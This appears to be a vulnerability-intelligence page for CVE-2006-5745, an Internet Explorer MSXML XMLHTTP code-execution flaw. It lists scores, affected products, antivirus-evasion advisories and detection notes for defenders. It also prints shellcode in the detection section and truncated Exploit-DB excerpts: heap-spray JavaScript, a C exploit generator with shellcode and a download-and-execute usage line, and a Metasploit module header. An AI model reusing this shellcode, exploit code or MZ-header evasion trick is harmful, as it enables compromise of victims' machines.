CVE-2006-5745
published 2006-11-06CVE-2006-5745: Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4.0 in Microsoft XML Core Services 4.0 on Windows, when…
PriorityP271high7.6CVSS 2.0
AVNACHAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
75.95%
99.5th percentile
Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4.0 in Microsoft XML Core Services 4.0 on Windows, when accessed by Internet Explorer, allows remote attackers to execute arbitrary code via crafted arguments that lead to memory corruption, a different vulnerability than CVE-2006-4685. NOTE: some of these details are obtained from third party information.
Affected
41 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ahnlab | v3_internet_security | — | — |
| ahnlab | v3_internet_security | — | — |
| aladdin | esafe | — | — |
| avast | avast_antivirus | — | — |
| avg | antivirus | — | — |
| avg | ewido_security_suite | — | — |
| clamav | clamav | — | — |
| clamav | clamav | — | — |
| debian | clamav | — | — |
| drweb | anti-virus | — | — |
| eset | nod32_antivirus | — | — |
| eset | nod32_antivirus | — | — |
| eset | smart_security | — | — |
| ewido | ewido_security_suite | — | — |
| fortinet | fortiguard_antivirus | — | — |
| free-av | antivir | — | — |
| free-av | antivir | — | — |
| hacksoft | the_hacker | — | — |
| hacksoft | the_hacker | — | — |
| hauri | virobot | — | — |
| hauri | virobot | — | — |
| ikarus | ikarus_antivirus | — | — |
| ikarus | ikarus_antivirus | — | — |
| k7computing | antivirus | — | — |
| k7computing | antivirus | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063
- →Exploit triggers via XMLHTTP ActiveX control's open() method called with Array objects followed by repeated setRequestHeader() calls with integer value 0x12345678 — detect this pattern in JavaScript within HTML documents. ↗
- →Metasploit module uses return address 0x0c0c0c0c for heap spray on Windows 2000 SP4 through Windows 2003 SP0 targets — presence of this address in memory or network content is a strong indicator. ↗
- →AV evasion technique: malicious HTML exploit document prefixed with MZ header (EXE magic bytes) and saved with no extension, .txt, or .jpg extension to bypass scanner detection. ↗
- →The exploit targets the XMLHTTP ActiveX object (MSXML); look for object tags or ActiveXObject instantiation referencing MSXML followed by anomalous open()/setRequestHeader() call patterns. ↗
- ·Metasploit module randomizes all JavaScript variable names on each request, so static variable-name signatures will not reliably detect the server-generated exploit. ↗
- ·Metasploit module also applies whitespace randomization to the generated HTML content, further evading static/pattern-based detection. ↗
- ·The exploit was confirmed working on Windows 2000 SP4, Windows XP SP2, and Windows 2003 Server SP0 with IE6 and Microsoft XML Core Services 4.0 SP2; detection scope should be limited to these legacy platforms. ↗
CVSS provenance
nvdv2.07.6HIGHAV:N/AC:H/Au:N/C:C/I:C/A:C
vulncheck2.6LOW
vendor_debian7.6LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7fgh-8wj3-28pj: avast! antivirus 4
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5523 [HIGH] CWE-20 GHSA-7fgh-8wj3-28pj: avast! antivirus 4
avast! antivirus 4.8.1281.0, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-hw4f-rwcw-rpqj: Prevx Prevx1 2, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ hea
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5538 [HIGH] CWE-20 GHSA-hw4f-rwcw-rpqj: Prevx Prevx1 2, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ hea
Prevx Prevx1 2, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-3x5p-6jhj-5q3p: VirusBuster 4
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5548 [HIGH] CWE-20 GHSA-3x5p-6jhj-5q3p: VirusBuster 4
VirusBuster 4.5.11.0, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-gxww-rc9c-h62v: AVG Anti-Virus 8
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5522 [HIGH] CWE-20 GHSA-gxww-rc9c-h62v: AVG Anti-Virus 8
AVG Anti-Virus 8.0.0.161, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-pqr2-vxcq-xhh2: Aladdin eSafe 7
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5528 [HIGH] CWE-20 GHSA-pqr2-vxcq-xhh2: Aladdin eSafe 7
Aladdin eSafe 7.0.17.0, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-fm4r-v379-gc4v: Norman Antivirus 5
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5535 [HIGH] CWE-20 GHSA-fm4r-v379-gc4v: Norman Antivirus 5
Norman Antivirus 5.80.02, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-hv6c-6rww-5vx8: Ewido Security Suite 4
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5530 [HIGH] CWE-20 GHSA-hv6c-6rww-5vx8: Ewido Security Suite 4
Ewido Security Suite 4.0, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-r635-23w3-8797: Secure Computing Secure Web Gateway (aka Webwasher), when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5540 [HIGH] CWE-20 GHSA-r635-23w3-8797: Secure Computing Secure Web Gateway (aka Webwasher), when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in
Secure Computing Secure Web Gateway (aka Webwasher), when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-8fh4-fw2w-p33q: CAT-QuickHeal 10
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5524 [HIGH] CWE-20 GHSA-8fh4-fw2w-p33q: CAT-QuickHeal 10
CAT-QuickHeal 10.00 and possibly 9.50, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-545h-2xw4-7w2f: Trend Micro VSAPI 8
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5545 [HIGH] CWE-20 GHSA-545h-2xw4-7w2f: Trend Micro VSAPI 8
Trend Micro VSAPI 8.700.0.1004 in Trend Micro AntiVirus, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-q94v-58qf-j5g7: ESET Smart Security, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an M
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5527 [HIGH] CWE-20 GHSA-q94v-58qf-j5g7: ESET Smart Security, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an M
ESET Smart Security, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-fjj9-88r7-m7jg: Ikarus Virus Utilities T3
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5532 [HIGH] CWE-20 GHSA-fjj9-88r7-m7jg: Ikarus Virus Utilities T3
Ikarus Virus Utilities T3.1.1.45.0 and possibly T3.1.1.34.0, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-qx57-9wcq-8jq6: AhnLab V3 2008
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5520 [HIGH] CWE-20 GHSA-qx57-9wcq-8jq6: AhnLab V3 2008
AhnLab V3 2008.12.4.1 and possibly 2008.9.13.0, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-xpp7-7jm5-hh44: Sunbelt VIPRE 3
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5542 [HIGH] CWE-20 GHSA-xpp7-7jm5-hh44: Sunbelt VIPRE 3
Sunbelt VIPRE 3.1.1832.2 and possibly 3.1.1633.1, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-m5gr-42wf-5c95: ClamAV 0
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5525 [HIGH] CWE-20 GHSA-m5gr-42wf-5c95: ClamAV 0
ClamAV 0.94.1 and possibly 0.93.1, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-5mhc-ccxf-v56m: DrWeb Anti-virus 4
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5526 [HIGH] CWE-20 GHSA-5mhc-ccxf-v56m: DrWeb Anti-virus 4
DrWeb Anti-virus 4.44.0.09170, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-mwf8-694v-fr83: Symantec AntiVirus (SAV) 10, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by plac
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5543 [HIGH] CWE-20 GHSA-mwf8-694v-fr83: Symantec AntiVirus (SAV) 10, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by plac
Symantec AntiVirus (SAV) 10, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-255r-f4p7-p9r5: Hacksoft The Hacker 6
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5544 [HIGH] CWE-20 GHSA-255r-f4p7-p9r5: Hacksoft The Hacker 6
Hacksoft The Hacker 6.3.1.2.174 and possibly 6.3.0.9.081, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-9mwq-pph6-9fp8: ESET NOD32 Antivirus 3662 and possibly 3440, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5534 [HIGH] CWE-20 GHSA-9mwq-pph6-9fp8: ESET NOD32 Antivirus 3662 and possibly 3440, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML
ESET NOD32 Antivirus 3662 and possibly 3440, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-v6cv-jf2w-vf97: K7AntiVirus 7
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5533 [HIGH] CWE-20 GHSA-v6cv-jf2w-vf97: K7AntiVirus 7
K7AntiVirus 7.10.541 and possibly 7.10.454, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-v2qr-5x6m-cfqv: Panda Antivirus 9
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5536 [HIGH] CWE-20 GHSA-v2qr-5x6m-cfqv: Panda Antivirus 9
Panda Antivirus 9.0.0.4, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-pvwc-4c48-gcmh: RISING Antivirus 21
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5539 [HIGH] CWE-20 GHSA-pvwc-4c48-gcmh: RISING Antivirus 21
RISING Antivirus 21.06.31.00 and possibly 20.61.42.00, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-463w-4vfg-qcpp: VirusBlokAda VBA32 3
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5546 [HIGH] CWE-20 GHSA-463w-4vfg-qcpp: VirusBlokAda VBA32 3
VirusBlokAda VBA32 3.12.8.5, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-5c7q-5827-28ch: Fortinet Antivirus 3
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5531 [HIGH] CWE-20 GHSA-5c7q-5827-28ch: Fortinet Antivirus 3
Fortinet Antivirus 3.113.0.0, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-4c72-xmxx-j6j8: Avira AntiVir 7
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5521 [HIGH] CWE-20 GHSA-4c72-xmxx-j6j8: Avira AntiVir 7
Avira AntiVir 7.9.0.36 and possibly 7.8.1.28, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-73p7-g7vq-jp9w: HAURI ViRobot 2008
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5547 [HIGH] CWE-20 GHSA-73p7-g7vq-jp9w: HAURI ViRobot 2008
HAURI ViRobot 2008.12.4.1499 and possibly 2008.9.12.1375, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-g97x-cqx3-893w: Sophos Anti-Virus 4
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5541 [HIGH] CWE-20 GHSA-g97x-cqx3-893w: Sophos Anti-Virus 4
Sophos Anti-Virus 4.33.0, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-jc7j-gx5r-wrwp: PC Tools AntiVirus 4
ghsa_unreviewed·2022-05-14·CVSS 7.6
CVE-2008-5537 [HIGH] CWE-20 GHSA-jc7j-gx5r-wrwp: PC Tools AntiVirus 4
PC Tools AntiVirus 4.4.2.0, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-7jx4-xpj4-xrmr: CA eTrust Antivirus 31
ghsa_unreviewed·2022-05-13·CVSS 7.6
CVE-2008-5529 [HIGH] CWE-20 GHSA-7jx4-xpj4-xrmr: CA eTrust Antivirus 31
CA eTrust Antivirus 31.6.6086, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
GHSA
GHSA-x5x2-7mmp-555x: Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4
ghsa_unreviewed·2022-05-01·CVSS 2.6
CVE-2006-5745 [LOW] GHSA-x5x2-7mmp-555x: Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4
Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4.0 in Microsoft XML Core Services 4.0 on Windows, when accessed by Internet Explorer, allows remote attackers to execute arbitrary code via crafted arguments that lead to memory corruption, a different vulnerability than CVE-2006-4685. NOTE: some of these details are obtained from third party information.
VulnCheck
Microsoft XML Core Services Vulnerability
vulncheck·2006·CVSS 2.6
CVE-2006-5745 [LOW] Microsoft XML Core Services Vulnerability
Microsoft XML Core Services Vulnerability
Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4.0 in Microsoft XML Core Services 4.0 on Windows, when accessed by Internet Explorer, allows remote attackers to execute arbitrary code via crafted arguments that lead to memory corruption, a different vulnerability than CVE-2006-4685. NOTE: some of these details are obtained from third party information.
Affected: Microsoft XMP Core Services
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://learn.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-071; https://www.virusbulletin.com/virusbulletin/
Debian
CVE-2008-5525: clamav - ClamAV 0.94.1 and possibly 0.93.1, when Internet Explorer 6 or 7 is used, allows...
vendor_debian·2008·CVSS 7.6
CVE-2008-5525 [HIGH] CVE-2008-5525: clamav - ClamAV 0.94.1 and possibly 0.93.1, when Internet Explorer 6 or 7 is used, allows...
ClamAV 0.94.1 and possibly 0.93.1, when Internet Explorer 6 or 7 is used, allows remote attackers to bypass detection of malware in an HTML document by placing an MZ header (aka "EXE info") at the beginning, and modifying the filename to have (1) no extension, (2) a .txt extension, or (3) a .jpg extension, as demonstrated by a document containing a CVE-2006-5745 exploit.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
No detection rules found.
Exploit-DB
Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)
exploitdb·2010-07-03
CVE-2006-5745 Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)
Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)
---
##
# $Id: ms06_071_xml_core.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Internet Explorer XML Core Services HTTP Request Handling',
'Description' => %q{
This module exploits a code execution vulnerability in Microsoft XML Core Services which
exists in the XMLHTTP ActiveX control. This module is the modifed version of
http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successful
Exploit-DB
Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (2)
exploitdb·2006-11-10
CVE-2006-5745 Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (2)
Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (2)
---
var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks
Exploit-DB
Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (3)
exploitdb·2006-11-10
CVE-2006-5745 Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (3)
Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (3)
---
/*
*
* MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit
* Works on Windows XP versions including SP2 and 2K
*
* Author: M03
*
* Credit: metasploit, jamikazu, yag kohna(for the shellcode), LukeHack (for the code),
* Greetz: to PimpinOYeah Subbart n0limit MpR c0rrupt raze
* :
* Tested :
* : Windows XP SP2 + Internet Explorer 6.0, XP SP1, 2KServer
* :
* :
* :
* :
* :Usage: filename [htmlfile]
* : filename.exe http://site.com/file.exe localhtml.htm
*
*/
#include
#include
#include
FILE *fp = NULL;
char *file = "MicroHack.htm";
char *url = NULL;
unsigned char sc[] =
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28
Exploit-DB
Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (1)
exploitdb·2006-11-08
CVE-2006-5745 Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (1)
Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (1)
---
var obj = null;
function exploit() {
obj = document.getElementById('target').object;
try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};
sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
sz = sh.length *
Metasploit
MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling
metasploit
MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling
MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling
This module exploits a code execution vulnerability in Microsoft XML Core Services which exists in the XMLHTTP ActiveX control. This module is the modified version of http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6 + Microsoft XML Core Services 4.0 SP2.
No writeups or analysis indexed.
http://blogs.securiteam.com/?p=717http://secunia.com/advisories/22687http://securitytracker.com/id?1017157http://www.iss.net/threats/239.htmlhttp://www.kb.cert.org/vuls/id/585137http://www.microsoft.com/technet/security/advisory/927892.mspxhttp://www.securityfocus.com/bid/20915http://www.us-cert.gov/cas/techalerts/TA06-318A.htmlhttp://www.vupen.com/english/advisories/2006/4334http://xforce.iss.net/xforce/alerts/id/239https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-071https://exchange.xforce.ibmcloud.com/vulnerabilities/30004https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A104https://www.exploit-db.com/exploits/2743http://blogs.securiteam.com/?p=717http://secunia.com/advisories/22687http://securitytracker.com/id?1017157http://www.iss.net/threats/239.htmlhttp://www.kb.cert.org/vuls/id/585137http://www.microsoft.com/technet/security/advisory/927892.mspxhttp://www.securityfocus.com/bid/20915http://www.us-cert.gov/cas/techalerts/TA06-318A.htmlhttp://www.vupen.com/english/advisories/2006/4334http://xforce.iss.net/xforce/alerts/id/239https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-071https://exchange.xforce.ibmcloud.com/vulnerabilities/30004https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A104https://www.exploit-db.com/exploits/2743
2006-11-06
Published
Exploited in the wild